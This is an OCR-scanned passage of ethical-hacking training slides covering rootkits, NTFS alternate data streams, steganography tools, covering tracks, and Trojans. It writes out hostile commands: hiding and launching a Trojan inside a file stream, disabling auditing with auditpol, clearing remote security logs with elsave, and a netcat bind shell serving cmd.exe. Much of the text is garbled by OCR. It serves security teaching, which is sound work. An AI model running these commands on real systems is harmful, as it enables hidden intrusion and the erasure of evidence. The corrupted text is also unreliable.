and net start _ root_ . 

© Once the rootkit is started, 
the f i I e _ root_ .sys stops 
appeari ng i n the di rectory 
listings. The rootkit 
i ntercepts the system cal I s 
for listing files and hides 
all files beginning with 
_root_ from display. 
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Rootkit - Screenshot 



Once the rootkit is started, the file root_ . sys stops appearing 
in directory listings. The rootkit intercepts the system calls for 
listing files and hides all files beginning with root from display. 



Here is a directory listing from a system, taken before and 
the attacker activated the rootkit: 



C:>dir 

Volume in drive C has no label. 
Volume Senal Number is 6C15-BAC3 



Before 



Directory of C: 
02/09/2001 05:06p 
01/05/2001 
01/05/2001 
01/04/2001 
01/04/2001 
02/10/2001 
02/09/2001 
02/10/2001 
02/10/2001 
12/06/1999 
09/02/1999 



11:12a 
11:11a 
08:06p 
08:08p 
04:51 p 
03:35p 
05:38p 
11:33a 
09:00p 
01 :07a 
3 File(s) 
B Dir(s] 



<DIR> asf 

<DIR> CAConfig 

<DIR> Documents and Settings 

<DIR> Inetpub 

<DIR> Program Files 

<DIR> rootkit 

<DIR> software 

<DIR> WINNT 
57,684 _root_. sys 
236,304 _root_cmd.exe 
59,392 _root_nc.exe 
353,380 bytes 
6,115,020,800 bytes free 
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Volume in drive C has no label. 
Volume Serial Number is 6C15-8AC3 




After 



Directory of C: 
02/09/2001 05:06p 
01/05/2001 
01/05/2001 
01/04/2001 
01/04/2001 
02/10/2001 
02/09/2001 
02/10/2001 



11:12a 
11:11a 
08:06p 
08:08p 
04:51 p 
03:35p 
05:3Sp 
0 File(s) 
8 Dir(s) 



<DIR> asf 
<DIR> CAConfig 
<DIR> Documents and Settings 
<DIR> Inetpub 
<DIR> Program Files 
<DIR> raotkit 
<DIR> soflv/are 
<DIR> WINNT 
0 bytes 
6,115,020,800 bytes free 
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Rootkit: Fu 



© It operates using Direct Kernel Object Manipulation 

© 1 1 comes with two components - the dropper (fu.exe), and 
the driver (msdirectx.sys) 

© It can: 

• H ide processes and drivers 

• List processes and drivers that were hidden using 
hooKing techniques 

• Add privileges to any process token 

• Make actions in the Windows Event Viewer appear as 
someone el se's acti ons 
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Rootkit:Vanquish 



I 




© Itisadll i njecti on- based, winapi hooking Rootkit 

© It hides files, folders, registry entries, and logs passwords 

© I n case of registry hidi ng. Vanquish uses an advanced 
^ system to keep track of enumerated keys/ val ues and hi des 
P the ones that need to be hidden 

tFor dll injections, the target process is first written with the 
string 'VANQUISH.DLL' (VirtualAllocEx, 
WriteProcessMemory) and then CreateRemoteThread 

© For API hooking. Vanquish uses various programming 
tricks 
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Rootkit Counter measures 



©Back up critical data and 
reinstall OS/ applications 
from trusted source 

©Don't rely on backups, as 
there is a chance of 
restori ng from troj aned 
software 

© Keep a wel I - d ocu men ted 
automated installation 
procedure 

© Keep aval I abi I i ty of trusted 
restoration media 



S AFX Windows Rootkit 2003 



Processes I Files 



I Files 1^ 



'•( 

Registrv Connections 



lithium.exe 



sub7.exe 

bionet.exe 

sdbot.exe 



f 




Generate Help About 

http: //www, iamaphex. cib. net ^1ttD://www■nne□asecurit^J■ora 



BC-Council 



CHC: Hiding files 



Copyright © byBC-Councll 
All Rights reserved. Reproduction is strictly prohibited 



Patchfinder2.0 



I 



© Patchfinder (PF) is a 
sophisticated diagnostic utility 
designed to detect system 
ibrariesand l<ernel compromises 



© Its primary use is to check if the 
given machine has been attacked 
with some modern rootkits like 
Hacker Defender, AFX, 
Vaniquish, He4Hook, etc. 
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Creati ng Alternate Data Streams 



I 



©Start by goi ng to the command 
I i ne and typi ng notepad test.txt. 

0 P ut some data i n the f i I e, save 
the file, and close Notepad. 

©From the command line, type 
dirtest.txt and note the file size. 

© N ext, go to the command I i ne 
and type notepad 
test.txt: hidden.txt. Type 
some text into Notepad, save the 
file, and close. 




©Check the file size again and 
notice that it hasn't changed! 

©On opening test.txt, only the 
original data will be seen. 

©On use of type command 
the f i I ename from the command 
line, only the original data is | 
displayed. 

©On typing type 
test.txt: hidden.txt, a syntax 
error message is displayed. 
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H ow to Create NTFS Streams? 



Notepad Is Streams compliant application: 

1. Launch c: \>not;epad myf ile. txt; lion. txt. Click 
' yes ' to create the new file and type 10 lines of 
data. Save the file. 

2 . Launch c: \>not:epad myf ile. txt: tiger, txt click 
' yes ' to create the new file and type other 20 
lines of text. Save the file. 

3 View the file size of myf ile. txt (it should be 
zero) 



4 . To modify the stream data open document 
' my file, txt: tiger, txt ' in notepad 
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NTFS stream Manipulation 




Trojan.exe (Size: 2 MB) 



To move the contents ofTrojan.exe to Readme. txt (stream): 
c: \> type c: \ Trojan, exe > c: \Readme. txt: Trojan, exe 




L 



Location c: 



Readme.txt (Size 0) 



To execute the Trojan.exe inside the Readme.txt (stream): 
c; \> start c: \Readnie. txt; Trojan, exe 



To extract the Trojan.exe from the Readme.txt (stream): 

c:\> cat c: \Readme. txt: Trojan, exe > Trojan, exe 



Note: cat is a Windows 2000 Resource Kit Utility 
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Tools: Makestrm.exe 



I 



makestrm.exe moves the physical contents of a fi le to its stream. 



DianondCS MakeStrean Demo - httpV/uuu.dianondcs .con.au 
x.org successfully converted to x.org:StreaiiTest 



© ads_ cat from Packet Storm is a util ity for writi ng to NTFS's Alternate 
File Streams and includesads_ extract, ads_cp, and ads_rm, utili 
to read, copy, and remove data from NTFS alternate file streams. 

© Mark Russinovich at www.sysinternals.com has released freeware 
uti I ity Streams which displays NTFS fi les that have alternate streams 
content. 





© H eysoft has released LADS (List Alternate Data Streams), which 
scans the entire drive or a given directory. It lists the names and sizes 
of al I alternate data streams it f i nds. 
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© Del eti ng a stream f i I e i n vol ves copy! ng the front f i I e to a FAT 
partition, then copying back to NTFS. 

© Streams are lost when the file is moved to FAT Partition. 

© LNS.exefrom (http://ntsecurity.nu/cgi- 
bin/ download/ lns.exe.pl) can detect streams. 
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What is Steganography? 



©Theprocessof hiding data in innages is called Steganography. 

©The most popular method for hiding data in files is to utilize graphic 
images as hiding places. 

© Attackers can embed information such as: 

L» Source code for hacki ng tool 

• L i St of compromi sed servers 

• P I ans f or f utu re attacks 

• Grandma's secret cookie reci pe 





StegajUDgra^hy 




Ctrver tmage 
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Tool : M erge Streams 



I 



© This uti I ity enables you to merge M S Word streams and M S Excel 
Workbook streams. 



L 




© It can hide MS Excel Workbooks within MS Word Documents or vice 
^ versa. M 



= Glue - INT Kernel Resources: www.ntkernel.com 



MS Word: 



MS Excel 



C:\Documents and Settings\Desktop\tesLdocj 



G:\test.xls 



Browse 



Merge 



Cancel 



Browse 



About 
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Invisi ble Folders 



© H ide any folder or a group of folders on your system by pressing a simple 
H otkey combi nati on . I 

©The selected folders will remain invisible until you decide to make them 
visible again using your hotkey combinations. 

© You can also password protect your hotkey combinations. 




Invisible Folders 



Jnlx] 



y — ^ 




^INVISIBLE 



Invisible Folder List- 



V~\ E:\Dominloads 



Add to List 



Remove From List 



Remove All 



Drag and Drop folders into the area above or simp!;) click 
"Add to List" and select them from the EKplorer menu. 













Activate Invisible 1 


Activate Visible | 


Purchase 




Options 1 


Ewit 
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Tool : I n vi si b e Secrets 4 



I 



A security suite that lielpsyou to liide files, encrypt files, 
destroy your I nternet traces, shred fi les, make secure I P to I P 
password transfers, and even lock any application on your 
computer. 



jy [Nqw!~| I Tell a Friend~| | Feedback ] | ftbout | | _ 1 1 X | 




Passwords | | Options | | Help 



Re^d ^bout the "carrier" concept. 



> Enf=r-ypt File^^ 

> Decrypt Fil^« 

> Open Cryptbo^ard 



® C2> 

> ^hirEi] FilES > IP-to-IP 

> Destroy Internet Traces Secure Password Transfer 



> Self-Decrypting PaclcagE 



> l_of=lcecl Applif=.ation« 
> Locker Settings 
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Tool : I mage H i de 



© I mage H ide is a steganography 
i program which hides loads of 

■ text i n i mages. 

©Does simple encryption and 
I decryption of data. 

© Even after addi ng bytes of 
data, there wi 1 1 not be any 
1 ncrease i n i mage si ze. 

I © I mage I ooks the same to 
L normal pai nt packages. 

[® Loads and saves to fi les and 

■ gets past all the mail sniffers. 
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I 



Limage Hide - Dancemmammal.conn 



File Edit Image Tools Window 



jnjxl 



^ lO Avoid saving files 




Copyright (c) 2001 Dancemamjnal 
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1 

©Camera/Shy works with Windows and I nternet Explorer and 
lets users share censored or sensitive i nformation buried 
within an ordinary GIF image. 

©The progrann lets users encrypt text with a cl ick of the nnouse 
and bury the text i n an i mage. The f i I es can be password 
protected for further security. 

©Viewers who open the pages with the Camera/ Shy browser 
tool can then decrypt the embedded text on the fly by double- 
cli eking on the image and supplying a password. 



Tool : Camera/ Shy 
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Camera/ Shy - Screenshot 



Welcome to JuggyBoy.com - Camera/Shy 



Utilities View Security Help Dedication 



0 ^ 0 ^ 0 g] 



Encryp^fl^^rFInnages in Webpagej Click to Load 



http; flLiwJWj.juggyboy.com/images/jugggyboy.gif 





GIF's Scanned; 7 
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Camera/ shy - Screenshot 



1 aboutiblank - 


lamera/Shy 




Utilities View Security Help Dedication 


0 


Q 


0 







http ;//mmm,juggyboy.com/ 




Done 

Encrypted GIF Images in WebpagOj Click to Load 



ihttp:]/™ww. iuqgyboy.com/imaqes/iuqqgyboy.qif 



|Camera/Shy Mode 

GIF's Scanned; 7 
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www.spammimic.com 




Address p 


[]http://www.spammimic, com/encode, cgi 






Google 


• I _»J| g&SsardiWeb - | 


0 1 |5l683blocted '51 AutoFill | @ Options ^ 





Encoded:, 



Your message Mona lisa gets encoded into spam as: 



I Dear Friend , This letter was specialiv selected to 

Ibe sent to you ! He will comply with all removal requests 

This mail is being sent in compliance with Senate 
Ibill 1622 ; Title 5 , Section 305 ! This is NOT unsolicited 
Bbulk mail ! Why work for somebody else when you can 
Bbecome r ich in 38 days ! Have you ever noticed people 
lare much more likely to BUY with a credit card than 
leash and more people than ever are surfing the web 

IiJell, now is your chance to capitalize on this ! 
|WE will help YOU use credit cards on your website and 
ISELL MORE ! You are guaranteed to succeed because we 
Itake all the risk . But don't believe us . Hr Jimes 
lof Co lor ado tr ied us and says "Now I'm rich, Rich, 
IrICH" ! ¥e are licensed to operate in all states . 
Ilf not for you then for your LOVED ONES - act now ! 
Isign up a friend and you'll get a discount of 60% ! 
I Best regards ! 




Encoded message. 



(Zap this message into your mailer 

...butit won'tbe sent until you click on Send) 

or 

You can copy the message out of the te>:t 
boK and paste it into a mail. 

• Launch your mail program 

• How to copy and paste in Windows 

• How to copy and paste in X 

• How to copy and paste on a Mac 



lour spammesi- qe Dear Friend , This letter was specially ... decodes to: 



home I encode | decode | explanation | credits | faq & feedback | terms | Franfais 

Cop>Ti^ © 2000-2005 spammimic .com, AH Ti^ii. reseo^d 



Decoded to... 
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Tool : M pBStego 




I 



© http:/ / www.techtv. com 

©M PBStego will hide information in MP3 files during the compression 
process. 

©The data is first compressed, encrypted, and then hidden in theMPB bit^ 
stream. 




C:\WINDOWS\Sy5tem32^cmd. e 



nix 



:SDeuelopnentM1P3Stego>encode -E liidden_text.txt -P pass suega.uau suega_stego .np3 

P3StegoEncoder 1.1.15 
pee READIIE file for copyright info 

icrosoft RIFF, UflUE audio, PCM, mono 44100Hz 16bit, Length: 0: 0:20 

PEG-I layer III, nono Psychoacoustic Model: fiT&T 

itrate=128 kbps De-enphasis: none CPC: off 

ncoding "svega.uau" to "svega_stego .np3" 

iding "hidden_text.txt" 
[Frane 791 of 791] <100.00K> Finished in 0: 0: 6 

:SDeuelopnentSMP3Stego>decode -X -P pass suega_stego .np3 
P3StegoEncoder 1.1.15 
ee README file for copyright info 
Input file = ' sgega_stego .np3' output file = ' sgega_stego .np3 .pen' 
ill attenpt to extract hidden infornation. Output: suega_stego.np3.txt 
he bit strean file suega_stego . np3 is a BINARV file 

DR: s=FFF, id=l, 1=3, ep=off, br=9, sf=0, pd=l, pr=0, n=3, js=0, c=0, o=0, e=0 
lg.=MPEG-l, layer=III, tot bitrate=128, sfrq=44.1 
ode=single-ch, sblini=32, jsbd=32, ch=l 
[Frane 791 Iflug slots/frane = 417.434; b/snp = 2.90; br = 127.839 kbps 
ecoding of "suega_stego .np3" is finished 

he decoded PCM output file nane is "suega_stego .np3 .pen" 



: SDeue lopnent\MP3Stego >_ 
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I 

© Snow is a whitespace steganography program and is used to 
conceal messages i n ASCI I text by appendi ng whitespace to 
the end of lines. 

© Because spaces and tabs are generally not visible in text 
viewers, the message is effectively hidden from casual 
observers. 

© I f the bui It-i n encryption is used, the message cannot be 
read even if it is detected. 



To Encode the Message to a file — myfile.doc 

snow -m "Swiss bank a/c: 3453434" -p "password-123' myfile.doc 
myf ile2 . doc. 

To extract the message, the command would be 

snow -p "password- 123" m.yfile2.doc 



Tool : Snow.exe 
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Steganography Detection 



©Stegdetect is an automated tool for detecting 
steganographic content in images. 

©I t is capable of detecti ng different 
steganographic methods to embed hidden 
information in J PEG images. 

©Stegbreak is used to launch dictionary attacks 
against J steg-Shell J PHide, and OutGuess 
O.Bb. 
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Stegdetect Screenshot 



"p^ Ksteg 




File Options 


Help 


Scan options 




Stop 


r jsteg 


Sensitivity: jl.OO") 


r jpliide 






r outguess 






r invisible 







Filename 


Detection 


E:\CHFI Proiect\CHFI V2\CHFI V2 Tools\Module 17 - Steqan 


negative 



A 



Message window: 



Starting stegdetect with -tjpoi -si .000 



A 
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Tool: dskprobeexe 



i 

© Run a low-level hard disk scanner to detect steganographic content 

• E.g. dskprobeexe can search the hard disk sectors for file contents 

0 Dskprobecan be found on Windows 2000 I nstallation CD-ROM under 
support directory 

© Steps to search for f i I e contents: 

• Launch dskprobeand open the physical drive to read 

• Click the Set Active button adjustment to the drive after it populates the 
handle '0' 

• Click Tools -> Search sectors and search for string efsO.tnnp (in sector 0 at the 
end of the disk) 

• Exhaustive Search should be selected and Case and U nicode characters 
should be ignored 
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System Hacking: 
PartV 



Coveri ng tracks 



CEH Hacking Cycle 




Cracki ng passwords 



Escalating privileges -i 




Covering tracks 
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© Once intruders have 
successfully gained 
Administrator access on a 
system, they wi 1 1 try to cover 
the detecti on of thei r 
presence. 

© When all the information of 
interest has been stripped off 
from the target, the i ntruder 
i nstal I s several back doors sc 
that easy access can be 
obtained in the future. 
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Disabling Auditing 



C:\> auditpol.exe /disable 
Running. . . . 

Local audit infomation changed successfully. 
New local audit policy. . . 

(0) Audit Disabled 

AuditCategouySystem = No 

Audita ategouyLog on = Failure 

AuditCategouyObj ectAccess = No 



C:\> auditpol.exe /enable 

Auditing enabled successfully. 



© First thing intruders will do 
after gaining Administrator 
privileges is to disable 
auditing. 

© NT Resource Kit's 
auditpol.exe tool can 
di sable auditi ng usi ng 
command line. 

© At the end of thei r stay, the 
i ntruders wi 1 1 j ust turn on 
auditing again using 
auditpol.exe. 



BC-Councll 



CHC: Hiding files 



Copyright © byBC-Council 
All Rights reserved. Reproduction is strictly prohibited 



Clearing the Event Log 



I 



'© Intruders can easily wipe I 
out the I ogs i n the event 
vi ewer 

[© This process will clear logs 
of al I records but wi 1 1 
I eave one record stati ng 
that the event log has been 
cleared by "Attacker" 



^ 5yit«iriliiiiifiTiitien 



I 



lis*. 



I Daw 



Error 
S^rof 
Qfrrv 

■is w*fi 
4 1 



'^■.ri'iittiii^rAr 



H:!^:4<t 



EvoA types 

F Difgimcllvi 

U Enw 



"3 



T*; 



OK 
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Tool: dsavaexe 



I 



I© elsave.exe Utility is a simple tool for clearing the event log. 

, © The foil owing syntax will clear the security logon the 
1 remote server 'rovi I ' (correct privi leges are requi red on the 
L remote system) . 



c:\> elsave -s Wrovil -I "Security" -C 



© Save the system log on the local machi ne to d:\ system.log 
and then clear the log: 

el save - 1 system - F d :\ system. I og - C 

© Save the appi i cati on I og on \ \ servl to 
\ \ servl\ d$\ appI i cati on . I og: 

el save - s \ \ servl - F d :\ appI i cati on . I og 
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H acki ng Tool : Wi nzapper 



© Wi nzapper is a tool tliat an attacl<er can use to erase event 
records selectively from the security log in Windows 2000. 

© To use the program, the attacker runs wi nzapper.exe and 
marks the event records to be deleted, then he presses 
Delete Events and Exit. 

© To sum thi ngs up: after an attacker has gai ned 
Ad mi nistrators access to the system, one si mply cannot 
trust the security I og. 
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Tool: Traceless 



I 



© Clear your I nternet setti ngs. 

© You can stop your home page from being written over by 
uninvited websites. 



Traceless 1.16 




Traceless 





Copyright © 2003-2005 Vantarakis Software. All rights reserved. 
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Tool: Tracks Eraser Pro 



I 



© Designed to protect you by 
cleaning up all the unwanted 
history data on your 
computer. 

© Al lows you to erase the 
cache, cookies, history, typed 
URLs, auto complete 
memory, i ndex.dat from your 
browsers, and Window's 
temp folder, run history, 
search history, open/ save 
history, and recent 
documents, etc. 



Tracks Eraser Pro ( Unregistered 




Cover Voijr Tracks 



w w w . n c : :: □ r T . n c T 




Task 



Status 



!lE Address Bar 
I IE Cookies 
i\E Cache 
i\E History 

I IE AutoComplete Forms and Passwords 
ilEPIuQlns 



2l 



Last Erased at: 1 M/2m 3:26:42 AM 



Erase Now 



Test Now 



Eraser Settings 



Options 



File Shredder 



Log 



About 



Help 



Exit 
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Tool : ZeroTracks 



I 



© Al I ows the user to cl ear pagi ng f i I es, recent documents, 
recycle bin, temp files, and run list in Start menu 

© You can also clear I nternet cache, temporary I nternet files, 
cookies, autocompletes 



Hom« 



Windom Miscellaneous 
Windom Paging File 
Windows Recent Docs 
Windows Recycle Bin 
Windows Temp Files 
Windows UserAs'sist 
Start Menu Run List 



/nternet £xf>lor*r 



Items vou have typed into 
the Start Menu Run box 
are recorded and cannot 
be deleted manuallv. 
These might even include 
website addresses. 



ZeroTracks - Suif History Eraser : 




p" Use Splash Screen 
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Summary 



© H ackers use a vari ety of means to penetrate systems. 

© Password guessi ng / cracki ng i s one of the f i rst steps. 

© Password sniffi ng is a preferred eavesdroppi ng tactic. 

© Vulnerability scanning aids hacker to identify which 
password cracking technique to use. 

© Key stroke I oggi ng / other spyware tool s are used as they 
gai n entry to systems to keep up the attacks. 

© I nvariably, evidence of "having been there and done the 
damage" i s el i mi nated by attackers. 

© Stealingfilesas well as hi ding files are means used to sneak 
out sensitive information. 
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Ethical Hacking 



ModuleVI 

Trojans and Backdoors 



Scenario 



I 



I t's Val enti ne's Day but J ack i s total I y 
shattered. The reason? J ill just 
rejected his proposal. J ack reacted 
calmly to the situation saying he 
would not mind, provided they could 
still befriends— to which J ill agreed. 

But something is going on in the back 
of his mi nd. . .he wants to teach J i 1 1 a 
lesson. J ack and J ill are studying in 
the computer department at the 
university campus. All the students 
have indi vidua PCs in their dorms. 
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Scenario 



I 



One day J ack emai Is an attachment that 
looks I ike a Word document to J ill. 
Unsuspectingly, J ill clicks the attachment 
but finds nothing in it. 

Bi ngo! ! J i 11 's system is i nfected by a remote 
access Trojan, but she is unaware of it. 

J ack has total control over J ill's system. 

Guess what J ack can do to J i 1 1 ? 

• Steal her passwords. 

• U se her system to attack other systems on 
the university campus. 

• Delete all her confidential files. 

• And a lot more. 
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Module Objective 



©Effect on business 
m ^ 

©Trojan definition and liow 
it worl<s 

©Types of Trojans 

©Wliat Trojan creators lool< 
for 

© D i fferent ways a Troj an 
can get i nto a system 

© I ndi cati ons of a Troj an 
attacl< 

©Some famous Trojans and 
ports used bytliem 
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I 



''© H ow to determi ne wliat 
ports are "listening" 

©Different Trojans found in 
the wild 

©Wrappers 

©Tools used for hacking 

©I CMP tunneling 

©Anti -Trojans 

© H ow to avoi d a Troj an 
infection 

©Summary 
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Module Flow 



I ntroduction to 
Troians 




^ Overt & Covert 
Channels 



Types and 
How Trojans Work 




Different Trojans ^ 



Indications of 
Trojan Attack 



I CMP Tunneling 




Anti -Trojan 



Counter measures 
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I 



© M al i ci ous users are al ways on the prowl to sneak i nto the 
network and create trouble 

©Several busi nesses around the globe have been affected 
by Trojan attacks 

© M ost of the ti me 1 1 1 s the absent- mi nded user who 1 n vi tes 
trouble by downloading files or not being bothered with 
the security aspects 

©This module covers different Trojans, the way they 
attack, and the tools used to send them across the network 
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I 



© 'They (hackers) don't care what ki nd of busi ness you 
are, they just want to use your computer/' says 
Assistant U.S. Attorney Floyd Short in Seattle, head of 
the Western Washington Cyber Task Force, a coalition 
of federal, state, and local criminal justice agencies 

© I f the data is altered or stolen, a company may risk 
losi ng credi bi I ity and the trust of thei r customers 

© There is a continued increase in malware that installs 
open proxi es on systems, especi al ly targeti ng 
broadband user's zombies 

© Busi nesses most at risk, experts say, are those handl i ng 
online financial transactions 



Effect on Business 
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What is a Trojan? 



I 



©A Trojan is a small program 
that runs hidden on an infected 
computer 

© With the help of a Trojan, an 
attacker gets access to stored 
passwords in theTrojaned 
computer and would be able to 
read personal documents, 
delete files and display pictures, 
and/ or show messages on the 
screen 
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Overt and Covert Channels 



Overt Channel 



© It is a legitimate 
communication path within 
a computer system or 
network for transfer of data 

© An overt channel can be 
exploited to create the 
presence of a covert 
channel by choosing 
components of the overt 
channels with care, that are 
idle or not related 



Covert Channel 



© It is a channel which 
transfers information 
within a computer system 
or network i n a way such 
that it violates security 
policy 

© The si mplest form of 
covert channel is a Trojan 
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© Attacker gets access to theTrojaned system as 
the system goes online 

© By way of the access provided by the Trojan, 
attacker can stage attacks of different types 
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Different Types of Trojan 



© Remote Access Troj ans 
©Data- Send i ng Trojans 
© Destructi ve Troj ans 
©Denial-of-service (DoS) Attack Troj ans 
©Proxy Troj ans 
©FTP Trojans 

©Security Software Disablers 
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What Do Trojan Creators Look For? 



©Credit card information, email addresses 
©Account data (passwords, user names, etc.) 
©Confidential documents 

©Financial data (bank account numbers, social security 
numbers, insurance information, etc.) 

©Calendar information concerning victim's whereabouts 

© Using the victim's computer for illegal purposes, such as 
to hack, scan, flood, or infiltrate other machines on the 
network or nternet 
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Different Ways a 
System 



©ICQ 
©IRC 

©Attachments 
©Physical access 

©Browser and ennail software bugs 

©NetBIOS (FileSharing) 

©Fake progranns 

©Untrusted sites and freeware 
software 

©Downloading files, games, and 
screensavers from an I nternet site 

©Legiti mate "shri nk-wrapped" 
software packaged by a disgruntled 
employee 
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rojan Can Get into a 



JBiHIWMf"~' 






Scan and Download Attachment 


Physical_Security_refers_to_those_practices.doc 


Scan and Save to my Yahoo! Briefcase 


.doc file 





^^^^^^ 



1 




Scan and Download Attaciiment 


Security_Checl(list_for_Wireless_Networl(,doc 


Scan and Save to my Yafioo! Briefcase 


.doc file 
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I ndi cations of a Trojan Attack 



©CD-ROM drawer opens and closes by itself 

©Computer screen flips upside down or inverts 

©Wallpaper or background settings change by 
themselves 

©Documents or messages print from the printer by 
themselves 

©Computer browser goes to a strange or unknown web 
page by itself 

©Wi ndows color setti ngs change by themselves 
©Screensaver setti ngs change by themselves 
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I ndications of a Trojan Attack (cont.) 



©Right and left mouse buttons reverse their 
functions 

© M ouse poi nter di sappears 

©|V| ouse moves by itself 

©Windows Start button disappears 

©Strange chat boxes appear on the vi cti m's 
computer and the victim is forced to chat with 
some stranger 

©The ISP complains to the victim that his/her 
computer is I P scanning 
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I ndications of a Trojan Attack (cont.) 



©People chatting with the victim know too nnuch 
personal information about him or his computer 

©Computer shuts down and powers off by itself 

©Taskbar disappears 

© The account passwords are changed or 
unauthorized persons can access legitimate 
accounts 

©Strange purchase statements i n credit card bi I Is 



TV 
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I ndications of a Trojan Attack (cont.) 



© The computer monitor turns itself off and on 

© |V| odem dials and connects to the I nternet by itself 

©Ctrl +Alt+Del stops worki ng 

© While rebooting the computer, a message flashes 
that there are other users sti 1 1 connected 
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Some Famous Trojans and Ports Used 
by Them 



Trojan 


Protocol 


Ports 


Back Orifice 


UDP 


31337 or 3B38 


Deep Throat 


UDP 


2140 and 3150 


NetBus 


TCP 


12345 and 12346 


Whacl<-a-mole 


TCP 


12361 and 12362 


NetBus 2 Pro 


TCP 


20034 


GirlFriend 


TCP 


21544 


Masters Paradise 


TCP 


31?q, 40421, 40422, 
40423 and 40426 
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How to Determine Which Ports Are 
"Listening" 



©Go to start -> Run -> cmd 

©Type net Stat -an and press Enter 

©Exit command shell 



C:N>netstat -an 
Active Connections 



Pro to 


Local Address 


Foreign Address 


state 


TCP 


0.0.0.0:7 


0.0.0.0:0 


LIGTENINC 


TCP 


0.0.0.0:9 


0.0.0.0:0 


LISTENING 


TCP 


0.0.0.0:13 


0.0.0.0:0 


LISTENING 


TCP 


0.0.0.0:17 


0.0.0.0:0 


LISTENING 


TCP 


0.0.0.0:19 


0.0.0.0:0 


LISTENING 


TCP 


0.0.0.0:23 


0.0.0.0:0 


LISTENING 


TCP 


0.0.0.0:135 


0.0.0.0:0 


LISTENING 


TCP 


0.0.0.0:445 


0.0.0.0:0 


LISTENING 


TCP 


0.0.0.0:1025 


0.0.0.0:0 


LISTENING 


TCP 


0.0.0.0:1026 


0.0.0.0:0 


LISTENING 


TCP 


0.0.0.0:1029 


0.0.0.0:0 


LISTENING 


TCP 


0.0.0.0:1030 


0.0.0.0:0 


LISTENING 


TCP 


0.0.0.0:1224 


0.0.0.0:0 


LISTENING 


TCP 


0.0.0.0:1681 


0.0.0.0:0 


LISTENING 


TCP 


0.0.0.0:1683 


0.0.0.0:0 


LISTENING 


TCP 


0.0.0.0:1685 


0.0.0.0:0 


LISTENING 


TCP 


0.0.0.0:1686 


0.0.0.0:0 


LISTENING 


TCP 


0.0.0.0:1801 


0.0.0.0:0 


LISTENING 


TCP 


0.0.0.0:2103 


0.0.0.0:0 


LISTENING 
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Classic Trojans Found in the Wild 



© Beast 
©Phatbot 
©Amitis 
©QAZ 

©Back Orifice 

©Bacl<Oriffice 
2000 





© Tini 
©NetBus 
©SubSeven 
© N etcat 
©Donald Dicl< 
©Let me rule 
©RECUB 



^lassie Trojans presented here as proof of concep^ 
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Trojan: Tini 



© It is a very tiny Trojan program wliicli isonly 3 l<band 
programmed i n assembly language. 1 1 takes mi ni mal 
bandwidth to get on victim's computer and takes small 
disk space. 

©Tini only listens on port 7777 and runs a command 
prompt when someone attaches to this port. The port 
number is fixed and cannot be customized. This makes 
it easi er for a vi cti m system to detect by scanni ng for 
port 7777. 

© F rom a ti ni cl i ent, the attacker can tel net to ti ni server 
at port 7777. 

sou rce: http :/ / ntsecu ri ty . n u/ tool box/ ti n i 



^^Si c Troj affSSf§fflj^^^Bo f of ^^^^^ 
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Trojan: NetBus 



©NetBus is a Wi n32- based 
Trojan program 

©Like Back Orifice, NetBus 
al I ows a remote user to 
access and control the 
vi cti m's machi ne by way of 
its Internet link 

©NetBus was written by a 
Swedish programmer Carl- 
F redri k N ei kter i n M arch 
1998 

©This virus is also known 
as Backdoor. Netbus 



f NetBus 1. GO, bycf 



IE] 



Server admin 



Open CD-ROM 



Show image 



Swap mouse 



Start program 



Msg manager 



Screendump 



Get info 



No connection 



Host nameilP: 
r ininterual: 
ProgramiURL: 
Text to send: 

Play sound 



localhost 



Connect! 



60 



Cmd delay: 



About 



hittp://Vvww.casino.com 



0 


i" 


Control mouse 









Exit Windows 



Send text 



Actiue wnds 



Mouse pos 



Listen 



Goto URL 



Key manager 



Sound sfystem 



File manager 



Source: http://www.jcw.cc/netbus-download.html 
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Trojan: Netcat 



E][;\WINNT\System32\[m(j,eKe - nc 210,212,219,76 80 




C:\Ppog™ Files\Iools\Netcat>nc 210.212.219.76 80 




GEI / HTTP 




HIIP/1.1 200 OK 




Date: Hon, 16 Jun 2003 06:21:22 Gfll 




Server: flpache/1.3.19 (Unix) (Red-Hat/Linux) 




Last-Modified: Sun, 15 Jun 2003 11:34:01 GMT 




Elag: "467d8-3619-3eec59a9" 




flccept-Ranges: bj/tes 




Content-Length: 13849 




Connection: close 




Content-Type: text/htnl 




<htnl) 





©Outbound or inbound 
connections, TCP or UDP, to 
or from any ports 
©Ability to use any local 
source port 

©Abi I ity to use any local ly 
configured network source 
address 

©Built-in port-scanning 
capabilities, with randomizer 
©Built-in loose source- routing 
capability 
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N etcat CI i ent/ Server 




Connect to the Netcat server 



Server pushes a "shell" to the client 




Netcat client 
nc <i p> <port> 



Netcat server 



nc - L - p <port> -t - e cmd.exe 
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Trojan: Beast 2.06 



I 



©Beast is a powerful Remote 
Administration Tool (AKA Trojan) 
built with Delphi 7 

©One of the disti net features of the 
Beast is that it is an all-in-one 
Trojan (client, server, and server 
editor are stored in the same 
application) 

©An i mportant feature of the server 
isthat it uses injecting technology 

© N ew versi on has system ti me 
management 



^» Beast 2.06 



□HQ 



Host 



127.0.0.1 



Password 



Port 



Go BEAST! 




Disconnected 



Build 
Server 



Plugins 
Binder 



SB 



Managers 



Windows 



Lamer Stuff 



Fun Stuff 



Server 



Misc 



Beast Stuff 



Files 



Registry 



Screen 



WebCam 



Apps 



Processes 



Services 



Clipboard 



Passwords 
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Wrappers 



I 



©How does an attacker get any Trojan installed on 
the victi m's connputer? Answer: Usi ng wrappers 

©A wrapper attaches a given EXE application 
(such as gannes or office application) to the Trojan 
executable 

©The two programs are wrapped together into a 
single file. When the user runs the wrapped EXE, 
it first installs the Trojan in the background and 
then runs the wrapped application in the 
foreground 

©The user only sees the latter application 




H C:\WINNT\sy 



f -\n\x\ 



C:\>tro jan .exe_ 



EE 



Chess.exe 90 k 

I 



Trojan.exe 20k 



J 



T 




Chess.exe UOk 



Attackers might send a birthday greeting which will install 
Trojan as the user watches a birthday cake dancing across 
the screen. 
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© Graffiti.exe is an 
example of a 
I egi ti mate f i I e that can 
be used to drop the 
Troj an i nto the target 
system 

© This program runs as 
soon as Windows 
boots up and on 
execution l<eepsthe 
user distracted for a 

Eiven period of time 
y running on the 

desl<top 
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Program 



I 
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Wrapping Tools 



© One fileexe maker 

• H el ps to combi ne two or more f i I es i nto a si ngl e f i I e 

• Compiles the sel Bled listof files into one host file 

• H ost f i I e i s a si mpl e compi I ed program 

• 1 1 decompress and executes the source program 

© Yet another bi nder 

• Created on March 2002 

• Supports Windows platform 

• Also known asYAB 
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L J 



Packaging Too 



© Open WordPad. Using the 
nnouse, drag-and-drop 
Notepad.exe i nto the WordPad 
window. On double-clicl<ingthe 
ennbedded icon, Notepad will 
